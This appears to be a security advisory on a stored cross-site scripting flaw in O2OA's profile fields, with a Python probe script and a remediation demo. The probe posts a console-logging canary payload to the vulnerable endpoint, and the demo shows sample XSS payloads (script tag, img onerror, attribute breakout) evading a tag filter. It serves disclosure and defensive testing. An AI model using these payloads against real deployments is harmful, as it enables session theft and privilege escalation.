O2OA Stored Cross-Site Scripting Vulnerability in Personal Profile Page Component
Vulnerability
A stored cross-site scripting vulnerability has been identified in O2OA versions through 10.0-410. The issue resides in the Personal Profile Page component and is reached through the '/x_query_assemble_designer/jaxrs/table' endpoint. Values submitted in the 'description', 'applicationName', and 'queryName' fields are stored without sanitization and later rendered by the application without output encoding, so attacker-supplied markup is interpreted as HTML and any script it carries executes in the browser of whoever views the stored data. The vulnerability can be exploited remotely by an authenticated user, and a public proof-of-concept exploit is available.
Impact
Exploitation of this vulnerability allows persistent execution of attacker-controlled JavaScript in the browser of any user who views the affected page, within the O2OA origin. This can lead to theft of session tokens or other sensitive user information and to unauthorized actions performed on behalf of authenticated users; because the payload runs in the victim's session, a low-privileged attacker can reach the privileges of any higher-privileged user who views the stored content.
Reproduction
To reproduce this vulnerability, send an authenticated POST request to the '/x_query_assemble_designer/jaxrs/table' endpoint with a script payload in the 'description', 'applicationName', and 'queryName' fields, including the required headers and the authorization token (an account with access to the endpoint is therefore needed). Once the record is stored, open the profile page that displays these fields; the payload executes when the page renders, which confirms the stored cross-site scripting. When testing, use a harmless payload tagged with a unique marker (for example one that only writes to the browser console) so that execution can be attributed to this request and no user of the system is affected.
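The following Python script is an added example for the procedure above; it is not the public proof-of-concept and not O2OA code. The endpoint and the three field names come from the advisory. The JSON body layout, the name of the token header ('x-token' is assumed) and any extra keys the endpoint may require are assumptions. Verification of execution still requires loading the profile page in a browser; the script only checks whether the value was stored unencoded.

```python
import html
import json
import secrets
import urllib.error
import urllib.request
from typing import Optional, Tuple

# Endpoint and field names are taken from the advisory. The JSON body layout, the
# token header name and the verification URL are assumptions made for this example;
# they are not taken from O2OA's documentation.
ENDPOINT = "/x_query_assemble_designer/jaxrs/table"
FIELDS = ("description", "applicationName", "queryName")


def make_probe(canary: str) -> str:
    """A harmless probe that only writes the canary to the browser console.

    It deliberately contains no double quotes, so a JSON API that stores it
    unchanged echoes it back verbatim instead of backslash-escaping it."""
    return f"<img src=x onerror=console.log('{canary}')>"


def build_body(canary: str, extra: Optional[dict] = None) -> dict:
    """JSON body with the probe in every field named in the advisory.

    Further keys the real endpoint may require are supplied via `extra`
    (assumed; the advisory does not list them)."""
    body = {field: make_probe(canary) for field in FIELDS}
    if extra:
        body.update(extra)
    return body


def send_probe(base_url: str, token: str, canary: str,
               token_header: str = "x-token",
               extra: Optional[dict] = None, timeout: float = 10.0) -> Tuple[int, str]:
    """POST the probe with the authorization token the advisory says is required.

    `token_header` defaults to "x-token" as an assumption; change it to whatever
    header the target deployment actually expects."""
    data = json.dumps(build_body(canary, extra)).encode("utf-8")
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT, data=data, method="POST",
        headers={"Content-Type": "application/json", token_header: token},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def classify_reflection(body_text: str, canary: str) -> str:
    """How did the stored value come back in a fetched response body?

    'raw'          probe markup is verbatim: stored without sanitization
    'html-encoded' only an HTML-escaped form is present: safe in an HTML text context
    'transformed'  the canary is present but in some other form (e.g. \\u003c escaping)
    'absent'       the canary never came back: not stored, or displayed elsewhere
    A 'raw' result in a JSON API response proves unsafe storage; execution is only
    confirmed by loading the page that renders the value."""
    probe = make_probe(canary)
    if probe in body_text:
        return "raw"
    # Match the escaped tag opening rather than a full escaped string, so that
    # renderers that encode the quote as &#x27; or &#39; are both recognised.
    if "&lt;img src=x onerror=console.log(" in body_text and canary in body_text:
        return "html-encoded"
    if canary in body_text:
        return "transformed"
    return "absent"


if __name__ == "__main__":
    import sys
    base, tok = sys.argv[1], sys.argv[2]   # base URL of the instance and a valid token
    canary = "xss" + secrets.token_hex(4)
    status, text = send_probe(base, tok, canary)
    print("POST status:", status, "stored value came back:", classify_reflection(text, canary))
    # Now open the profile page that displays these fields and look for the
    # canary in the browser console; that, not the API response, proves execution.
```

The canary is what makes the test trustworthy: a reflection of a generic payload could come from data stored by somebody else, while a random marker ties the observation to this request.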
Remediation
The vendor has acknowledged this issue and stated that it will be fixed in a future version. Until a fixed release is available, treat contextual output encoding at render time as the primary control: HTML-encode the 'description', 'applicationName', and 'queryName' values (and any other user-supplied profile field) wherever they are written into a page, using the encoding appropriate to the context (HTML text node, attribute value, or JavaScript string). Filtering and escaping user input before storage is a worthwhile second layer, but it is not sufficient on its own, since blacklists that remove tags such as '<script>' are routinely bypassed with event handler attributes on other tags. A Content-Security-Policy that disallows inline script limits what a stored payload can do while the fix is pending.
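The Python below is an added example, not O2OA code, illustrating why the remediation above puts output encoding first. It renders constructed sample values (not payloads from the public PoC) through an unsafe sink, through a tag-stripping input filter, and through context-appropriate encoding, and uses a small HTML-parser oracle to decide whether the stored value turned into markup. The template tags 'td' and 'input' are assumed stand-ins for however O2OA actually displays these fields.

```python
import html
import re
from html.parser import HTMLParser

# Constructed samples of what could be stored in the 'description',
# 'applicationName' or 'queryName' fields (not payloads from the public PoC).
SAMPLES = {
    "script_tag":    "<script>alert(1)</script>",
    "event_handler": "<img src=x onerror=alert(1)>",
    "attr_breakout": '" onmouseover="alert(1)',
}

SCRIPT_TAG = re.compile(r"</?\s*script[^>]*>", re.IGNORECASE)


def strip_script_tags(value: str) -> str:
    """The kind of input 'filter' often bolted on after an XSS report: removes
    <script> tags and nothing else. Kept here only to show why it is not a fix."""
    return SCRIPT_TAG.sub("", value)


# Unsafe sinks: the stored value is concatenated straight into markup.
def render_text_unsafe(value: str) -> str:
    return f"<td>{value}</td>"


def render_attr_unsafe(value: str) -> str:
    return f'<input type="text" value="{value}">'


# Hardened sinks: encode for the context the value lands in.
def render_text_encoded(value: str) -> str:
    return f"<td>{html.escape(value, quote=True)}</td>"


def render_attr_encoded(value: str) -> str:
    # quote=True also encodes " and ', which is what keeps the attribute closed.
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag and every on* attribute a browser would see."""

    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.lower().startswith("on"))


def would_execute(rendered: str, template_tags=("td", "input")) -> bool:
    """Oracle: does the rendered HTML contain a tag the template did not emit,
    or any event-handler attribute? Either means the stored value became code."""
    p = _TagCollector()
    p.feed(rendered)
    p.close()
    return any(t not in template_tags for t in p.tags) or bool(p.handlers)


def assess(value: str) -> dict:
    """Compare the strategies for one stored value: True means the payload
    would execute when rendered."""
    return {
        "filter_only": would_execute(render_text_unsafe(strip_script_tags(value))),
        "encode_text": would_execute(render_text_encoded(value)),
        "attr_unsafe": would_execute(render_attr_unsafe(value)),
        "encode_attr": would_execute(render_attr_encoded(value)),
    }


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, assess(sample))
```

The oracle parses the rendered fragment instead of grepping it because the question is what a browser would build from the markup: the tag-stripping filter leaves the event-handler sample intact and it still becomes an img element with an onerror attribute, while the attribute-breakout sample never contains a tag at all and only becomes code when it lands unencoded inside an attribute. Encoding for the right context neutralises every sample; the filter neutralises only the one it was written for.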
